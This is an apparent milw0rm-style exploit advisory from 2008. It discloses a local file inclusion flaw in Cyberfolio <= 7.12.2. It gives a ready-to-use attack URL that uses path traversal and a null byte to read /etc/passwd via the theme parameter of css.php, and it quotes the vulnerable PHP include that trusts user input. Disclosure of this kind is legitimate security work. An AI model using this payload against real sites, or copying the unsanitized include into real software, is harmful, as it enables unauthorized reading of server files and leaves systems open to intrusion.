36 lines
No EOL
1.1 KiB
Text
36 lines
No EOL
1.1 KiB
Text
:::::::-. ... ::::::. :::.
|
|
;;, `';, ;; ;;;`;;;;, `;;;
|
|
`[[ [[[[' [[[ [[[[[. '[[
|
|
$$, $$$$ $$$ $$$ "Y$c$$
|
|
888_,o8P'88 .d888 888 Y88
|
|
MMMMP"` "YmmMMMM"" MMM YM
|
|
|
|
[ Discovered by dun \ dun[at]strcpy.pl ]
|
|
|
|
##################################################################
|
|
# [ Cyberfolio <= 7.12.2 ] Local File Inclusion Vulnerability #
|
|
##################################################################
|
|
#
|
|
# Script site: http://cyberfolio.org/
|
|
# Download: http://cyberfolio.org/Version-7-12-2
|
|
#
|
|
# Vuln: http://site.com/cyberfolio_7_12.2/portfolio/css.php?theme=../../../../../../etc/passwd%00
|
|
#
|
|
# Bug: ./cyberfolio_7_12.2/portfolio/css.php (lines: 30-33)
|
|
#
|
|
# ...
|
|
# if (file_exists("./themes/".$_GET[theme].".php")) {
|
|
# include_once("./themes/".$_GET[theme].".php"); // LFI
|
|
# }
|
|
# ...
|
|
#
|
|
#
|
|
###############################################
|
|
# Greetz: D3m0n_DE * str0ke * and otherz..
|
|
###############################################
|
|
|
|
[ dun / 2008 ]
|
|
|
|
*******************************************************************************************
|
|
|
|
# milw0rm.com [2008-11-08] |